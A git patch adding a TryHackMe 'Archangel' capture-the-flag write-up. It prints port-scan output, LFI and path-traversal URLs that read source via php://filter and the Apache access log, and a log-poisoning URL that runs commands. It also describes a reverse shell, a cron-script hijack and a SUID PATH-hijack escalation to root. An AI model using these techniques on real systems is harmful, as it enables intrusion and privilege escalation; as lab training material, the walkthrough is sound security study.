From 846f799f0c1ec7c3385d056f48139428528559fb Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Fri, 19 Feb 2021 00:56:38 +0500
Subject: [PATCH] Add files via upload
---
TryHackMe/Archangel.md | 179 +++++++++++++++++++++++++++++++++++++++++
1 file changed, 179 insertions(+)
create mode 100644 TryHackMe/Archangel.md
diff --git a/TryHackMe/Archangel.md b/TryHackMe/Archangel.md
new file mode 100644
index 0000000..6c65c75
--- /dev/null
+++ b/TryHackMe/Archangel.md
@@ -0,0 +1,179 @@
+# TryHackMe-Archangel
+
+## Rustscan
+
+```
+rustscan -a 10.10.53.100 -- -A -sC -sV
+.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
+| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
+| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
+`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
+The Modern Day Port Scanner.
+________________________________________
+: https://discord.gg/GFrQsGy :
+: https://github.com/RustScan/RustScan :
+ --------------------------------------
+😵 https://admin.tryhackme.com
+[~] The config file is expected to be at "/root/.rustscan.toml"
+[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
+[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
+Open 10.10.53.100:22
+Open 10.10.53.100:80
+[~] Starting Script(s)
+[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
+
+PORT STATE SERVICE REASON VERSION
+22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+| ssh-hostkey:
+| 2048 9f:1d:2c:9d:6c:a4:0e:46:40:50:6f:ed:cf:1c:f3:8c (RSA)
+| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDPrwb4vLZ/CJqefgxZMUh3zsubjXMLrKYpP8Oy5jNSRaZynNICWMQNfcuLZ2GZbR84iEQJrNqCFcbsgD+4OPyy0TXV1biJExck3OlriDBn3g
+9trxh6qcHTBKoUMM3CnEJtuaZ1ZPmmebbRGyrG03jzIow+w2updsJ3C0nkUxdSQ7FaNxwYOZ5S3X5XdLw2RXu/o130fs6qmFYYTm2qii6Ilf5EkyffeYRc8SbPpZKoEpT7TQ08VYEICier9ND408
+kGERHinsVtBDkaCec3XmWXkFsOJUdW4BYVhrD3M8JBvL1kPmReOnx8Q7JX2JpGDenXNOjEBS3BIX2vjj17Qo3V
+| 256 63:73:27:c7:61:04:25:6a:08:70:7a:36:b2:f2:84:0d (ECDSA)
+| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKhhd/akQ2OLPa2ogtMy7V/GEqDyDz8IZZQ+266QEHke6vdC9papydu1wlbdtMVdOPx1S6zxA4
+CzyrcIwDQSiCg=
+| 256 b6:4e:d2:9c:37:85:d6:76:53:e8:c4:e0:48:1c:ae:6c (ED25519)
+|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBE3FV9PrmRlGbT2XSUjGvDjlWoA/7nPoHjcCXLer12O
+80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
+| http-methods:
+|_ Supported Methods: GET POST OPTIONS HEAD
+|_http-server-header: Apache/2.4.29 (Ubuntu)
+|_http-title: Wavefire
+Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
+
+```
+
+## PORT 80 (HTTP)
+
+
+
+Looking at the source code we can find a domain name
+
+
+
+So lets put this is in our `/etc/hosts` file
+
+
+
+
+
+Now we need to fuzz for a page that is "under development" for that I am going to use gobuster
+
+
+
+And we found a `test.php` file
+
+
+
+
+
+On clicking the button we can see on the url there's a GET parameter being used so we can check for LFI (Local File Inclusion) vulnerability. I tired a bunch of LFI techniques like `../../../../etc/passwd` but it failed.
+
+
+
+I used this technqiue what it does is that encodes the whole page into base64.
+
+`http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/mrrobot.php`
+
+
+
+We can do this for `test.php` as well
+
+`http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php`
+
+
+
+
+
+
+
+We can fuzz for /etc/passwd to do that we can use `wfuzz`
+
+```
+http://mafialive.thm/test.php?view=/var/www/html/development_testing/test.php
+```
+
+
+
+This doesn't help as we are getting the length of the response 286 and 310 which is not /etc/passwd so we can hide that response
+
+
+
+
+
+For getting a reverse shell we need to poison the apach2 log file but before that we need to make sure that log is being accessbile.
+
+
+
+We can access the log by the method above
+
+```
+http://mafialive.thm/test.php?view=/var/www/html/development_testing./.././.././.././..///var/log/apache2/access.log
+```
+
+
+
+Now intercept the request through burp suite and add php GET parameter code in `User-Agent`
+
+
+
+Let's try to access the page with `&c=id` at the end
+
+```
+http://mafialive.thm/test.php?view=/var/www/html/development_testing./.././.././.././..///var/log/apache2/access.log&c=id
+```
+
+
+
+We can at the bottom of the page that id command was executed so we can now get a reverse shell
+
+Host a file having a reverse shell payload in it
+
+
+
+
+
+On running the command
+
+
+
+Now we need to give it permission to execute
+
+
+
+Execute it
+
+
+
+
+
+Checking cronjobs we see
+
+
+
+
+
+We can see that this file can be written by anyone so we can write bash reverse shell to get a shell as user `archangel`
+
+
+
+And we got the shell
+
+
+
+We can see `backup` binary having a SUID also it belongs to root user and group , on using strings on it
+
+
+
+We can see that it's using cp (copy command) so here PATH exploitation comes where we can create a binary with the same name having `bash` in it and then set PATH where that "fake" binary is stored
+
+
+
+
+Now run that binary
+
+
+
+For simplicity I made /bin/bash a SUID to run as root
+
+